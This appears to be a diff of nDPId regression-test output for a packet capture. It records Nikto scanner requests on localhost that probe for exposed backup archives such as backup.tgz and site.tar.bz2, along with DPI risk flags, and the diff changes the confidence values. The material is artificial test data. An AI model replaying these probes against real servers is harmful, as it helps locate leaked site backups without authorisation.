+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 